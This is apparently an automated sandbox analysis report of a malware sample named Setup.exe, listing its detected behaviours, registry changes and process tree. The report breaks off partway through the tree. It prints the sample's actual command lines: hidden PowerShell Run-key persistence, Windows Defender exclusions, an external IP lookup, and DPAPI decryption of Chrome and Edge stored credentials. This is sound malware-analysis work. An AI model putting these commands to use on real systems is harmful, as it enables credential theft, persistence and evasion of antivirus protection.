Analysis
max time kernel: 140s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/07/2024, 11:30
Static task: static1
Behavioral task: behavioral1
  Sample: Setup.exe
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: Setup.exe
  Resource: win10v2004-20240709-en
General
Target: Setup.exe
Size: 37.6MB
MD5: 578301380ec4b2da9433e8e9a13e725f
SHA1: abc3b5d3668f7436c60e15abdb10566b25ed2d2b
SHA256: f03ff5ad41acc12ee8b940934a1341f7bdd98e09eb9a6c92704e2067020f8b41
SHA512: b6f893c1fdb1d11bb40429fa554cc8a7f4bd49e5766c3a47a2dcb90e5eec6ba5c71c8cc02466c51f9c6775ce0100788087693649656f6aeaca7a62c5c0e01125
SSDEEP: 393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mg896l+ZArYsFRl0PX:R3on1HvSzxAMN8FZArYssPv0q7OZaFN1
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 5 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid / Process: 5028 powershell.exe, 2328 powershell.exe, 1620 powershell.exe, 2520 powershell.exe, 4796 powershell.exe

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation (Setup.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Control Panel\International\Geo\Nation (cscript.exe)

Loads dropped DLL (1 IoCs)
  pid / Process: 3164 Setup.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 2 IoCs)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\QVMpJuFULqHDdog.ps1\"" (powershell.exe)
  - Set value (str): \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Setup.exe" (reg.exe)

Hide Artifacts: Hidden Window (1 TTPs, 1 IoCs)
Windows that would typically be displayed when an application carries out an operation can be hidden.
  pid / Process: 1412 cmd.exe

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow / ioc: 24 api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  pid / Process: 2212 cmd.exe, 4296 cmd.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Detects videocard installed (1 TTPs, 13 IoCs)
Uses WMIC.exe to determine videocard installed.
  pid / Process: 3568 WMIC.exe, 1624 WMIC.exe, 3608 WMIC.exe, 2028 WMIC.exe, 1512 WMIC.exe, 2564 WMIC.exe, 624 WMIC.exe, 2708 WMIC.exe, 3548 WMIC.exe, 4736 WMIC.exe, 624 WMIC.exe, 1068 WMIC.exe, 1268 WMIC.exe

Enumerates processes with tasklist (1 TTPs, 2 IoCs)
  pid / Process: 1572 tasklist.exe, 4272 tasklist.exe
Modifies data under HKEY_USERS (64 IoCs)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates (SearchFilterHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21824 = "Camera Roll" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-107 = "Microsoft Excel Comma Separated Values File" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9938 = "3GPP2 Audio/Video" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9902 = "Movie Clip" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-12385 = "Favorites Bar" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\OpenWithList (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mid\OpenWithList (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@windows.storage.dll,-21825 = "3D Objects" (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5985FC23-2588-4D9A-B38B-7E7AFFAB3155} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000007b62a5d161dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE (SearchFilterHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{A38B883C-1682-497E-97B0-0A3A9E801682} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000206467d161dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{AEB16279-B750-48F1-8586-97956060175A} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000004bce74d261dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-123 = "Microsoft Word Document" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\OpenWithList (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9936 = "QuickTime Movie" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\cabview.dll,-20 = "Cabinet File" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.DVR-MS\OpenWithList (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{80009818-F38F-4AF1-87B5-EADAB9433E58} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000005ff57bd261dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4804 = "JavaScript File" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-176 = "Microsoft PowerPoint Macro-Enabled Presentation" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie (SearchFilterHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Multimedia (SearchFilterHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xhtml\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-915 = "XHTML Document" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-131 = "Rich Text Format" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\ieframe.dll,-913 = "MHTML Document" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-142 = "Microsoft OneNote Table Of Contents" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.snd\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-114 = "OpenDocument Spreadsheet" (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1E589E9D-8A8D-46D9-A2F9-E6D4F8161EE9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001cfee0d161dbda01 (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{3DBEE9A1-C471-4B95-BBCA-F39310064458} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c89f62d161dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.shtml (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-140 = "Microsoft OneNote Section" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-172 = "Microsoft PowerPoint 97-2003 Slide Show" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft (SearchFilterHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9932 = "MP4 Video" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\unregmp2.exe,-9933 = "MPEG-4 Audio" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000c4c2c6d161dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device (SearchFilterHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Common Files\system\wab32res.dll,-10100 = "Contacts" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\oregres.dll,-121 = "Microsoft Word 97 - 2003 Template" (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device (SearchFilterHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.svg (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.rmi\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\acppage.dll,-6002 = "Windows Batch File" (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{01BE4CFB-129A-452B-A209-F9D40B3B84A5} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000d3b194d161dbda01 (SearchProtocolHost.exe)
  - Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.aif\OpenWithList (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\System32\wshext.dll,-4803 = "VBScript Encoded Script File" (SearchProtocolHost.exe)
  - Set value (data): \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{5383EF74-273B-4278-AB0C-CDAA9FD5369E} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 01000000000000001f0184d161dbda01 (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\notepad.exe,-469 = "Text Document" (SearchProtocolHost.exe)
  - Set value (str): \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@"C:\Windows\system32\windowspowershell\v1.0\powershell.exe",-105 = "Windows PowerShell XML Document" (SearchProtocolHost.exe)
Modifies registry key (1 TTPs, 2 IoCs)
  pid / Process: 8 reg.exe, 3096 reg.exe

Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid / Process: 3824 schtasks.exe

Suspicious behavior: EnumeratesProcesses (59 IoCs)
  pid / Process (count of occurrences): 2520 powershell.exe (x2), 4312 powershell.exe (x2), 4112 powershell.exe (x2), 1620 powershell.exe (x3), 5028 powershell.exe (x3), 4312 powershell.exe (x3), 2328 powershell.exe (x3), 1520 powershell.exe (x3), 2716 powershell.exe (x3), 4900 powershell.exe (x3), 4848 powershell.exe (x2), 4796 powershell.exe (x2), 4848 powershell.exe (x1), 4796 powershell.exe (x1), 2500 powershell.exe (x3), 4312 powershell.exe (x3), 3164 Setup.exe (x3), 1844 powershell.exe (x3), 3928 powershell.exe (x3), 872 powershell.exe (x3), 5080 powershell.exe (x3), 3520 powershell.exe (x3), 2772 powershell.exe (x2)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  - Token: SeDebugPrivilege (2520 powershell.exe)
  - Token: SeDebugPrivilege (1572 tasklist.exe)
  - Token: SeDebugPrivilege (4272 tasklist.exe)
  - Token: SeDebugPrivilege (4312 powershell.exe)
  - Token: SeDebugPrivilege (4112 powershell.exe)
  - 68 WMIC.exe, Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - 2816 WMIC.exe, Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - 68 WMIC.exe, Tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
  description (pid Process, procid_target); each write is recorded twice in the report:
  - PID 3164 wrote to memory of 5092 (3164 Setup.exe, 88) x2
  - PID 5092 wrote to memory of 1900 (5092 cmd.exe, 89) x2
  - PID 5092 wrote to memory of 2520 (5092 cmd.exe, 90) x2
  - PID 2520 wrote to memory of 1436 (2520 powershell.exe, 93) x2
  - PID 1436 wrote to memory of 3608 (1436 csc.exe, 94) x2
  - PID 3164 wrote to memory of 668 (3164 Setup.exe, 95) x2
  - PID 668 wrote to memory of 4076 (668 cmd.exe, 96) x2
  - PID 3164 wrote to memory of 4940 (3164 Setup.exe, 97) x2
  - PID 4940 wrote to memory of 1572 (4940 cmd.exe, 98) x2
  - PID 3164 wrote to memory of 1608 (3164 Setup.exe, 101) x2
  - PID 3164 wrote to memory of 2212 (3164 Setup.exe, 102) x2
  - PID 1608 wrote to memory of 4272 (1608 cmd.exe, 103) x2
  - PID 2212 wrote to memory of 4312 (2212 cmd.exe, 104) x2
  - PID 3164 wrote to memory of 4296 (3164 Setup.exe, 105) x2
  - PID 4296 wrote to memory of 4112 (4296 cmd.exe, 106) x2
  - PID 3164 wrote to memory of 4812 (3164 Setup.exe, 107) x2
  - PID 3164 wrote to memory of 4868 (3164 Setup.exe, 108) x2
  - PID 3164 wrote to memory of 4908 (3164 Setup.exe, 109) x2
  - PID 3164 wrote to memory of 1412 (3164 Setup.exe, 110) x2
  - PID 4812 wrote to memory of 68 (4812 cmd.exe, 145) x2
  - PID 4868 wrote to memory of 1976 (4868 cmd.exe, 113) x2
  - PID 4908 wrote to memory of 3824 (4908 cmd.exe, 112) x2
  - PID 3164 wrote to memory of 4100 (3164 Setup.exe, 146) x2
  - PID 1412 wrote to memory of 1620 (1412 cmd.exe, 115) x2
  - PID 4100 wrote to memory of 2816 (4100 cmd.exe, 116) x2
  - PID 3164 wrote to memory of 516 (3164 Setup.exe, 117) x2
  - PID 516 wrote to memory of 4180 (516 cmd.exe, 118) x2
  - PID 3164 wrote to memory of 4504 (3164 Setup.exe, 119) x2
  - PID 4504 wrote to memory of 2348 (4504 cmd.exe, 120) x2
  - PID 3164 wrote to memory of 4900 (3164 Setup.exe, 121) x2
  - PID 4900 wrote to memory of 3808 (4900 cmd.exe, 122) x2
  - PID 4900 wrote to memory of 4148 (4900 cmd.exe, 123) x2

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
(Each entry: [depth] image path, then the command line, matched signatures, and PID.)

[1] C:\Users\Admin\AppData\Local\Temp\Setup.exe
    command: "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    - Checks computer location settings
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 3164

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      - Suspicious use of WriteProcessMemory
      PID: 5092

    [3] C:\Windows\system32\cmd.exe
        command: C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        PID: 1900

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell.exe -noprofile -
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 2520

      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pft4ryoz\pft4ryoz.cmdline"
          - Suspicious use of WriteProcessMemory
          PID: 1436

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9347.tmp" "c:\Users\Admin\AppData\Local\Temp\pft4ryoz\CSC99EC05581CD945618B9E5F1369787A6B.TMP"
            PID: 3608
  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      - Suspicious use of WriteProcessMemory
      PID: 668

    [3] C:\Windows\system32\curl.exe
        command: curl http://api.ipify.org/ --ssl-no-revoke
        PID: 4076

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      - Suspicious use of WriteProcessMemory
      PID: 4940

    [3] C:\Windows\system32\tasklist.exe
        command: tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
        PID: 1572

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      - Suspicious use of WriteProcessMemory
      PID: 1608

    [3] C:\Windows\system32\tasklist.exe
        command: tasklist
        - Enumerates processes with tasklist
        - Suspicious use of AdjustPrivilegeToken
        PID: 4272
  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory
      PID: 2212

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,13,78,225,238,81,242,54,93,114,41,201,135,233,255,51,75,238,124,114,206,112,243,167,94,224,197,29,56,62,200,31,128,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,40,81,43,68,9,153,70,109,187,36,190,193,130,199,26,127,136,124,228,38,75,140,243,89,30,61,103,46,86,143,248,114,48,0,0,0,74,114,75,149,196,38,186,148,133,105,94,129,195,110,235,68,200,129,136,10,22,240,206,253,218,83,18,90,16,39,9,59,49,59,29,171,216,54,192,146,21,178,227,71,99,75,94,246,64,0,0,0,180,88,177,47,121,123,242,119,228,145,146,122,99,155,71,54,241,51,242,143,81,213,228,170,129,248,243,66,58,36,75,175,250,106,42,226,225,210,105,192,4,197,208,8,192,1,143,181,94,58,123,195,86,100,93,247,64,252,117,239,146,183,104,157), $null, 'CurrentUser')
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 4312

  [2] C:\Windows\system32\cmd.exe
      command: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,145,13,58,124,30,40,189,70,165,100,34,30,6,236,216,24,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,226,20,29,26,98,64,44,226,214,150,140,5,93,9,205,157,159,142,9,7,42,55,240,110,187,23,162,197,9,239,20,46,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,187,82,227,91,150,150,10,73,155,252,195,239,145,62,190,145,28,48,233,205,131,115,209,185,225,150,206,173,252,73,23,0,48,0,0,0,55,32,18,46,197,59,107,47,89,116,117,185,66,233,212,221,74,21,152,12,51,238,20,40,9,173,78,120,242,64,7,86,235,65,242,114,115,156,18,65,86,66,251,152,179,54,32,45,64,0,0,0,99,246,183,155,42,60,223,219,232,128,240,225,213,68,124,100,113,0,228,185,135,178,112,127,159,177,22,200,242,183,134,29,223,162,60,116,168,153,158,193,120,62,40,23,107,206,25,85,46,230,94,142,143,13,74,105,180,61,20,0,122,6,4,110), $null, 'CurrentUser')"
      - An obfuscated cmd.exe command-line is typically used to evade detection.
      - Suspicious use of WriteProcessMemory
      PID: 4296

    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
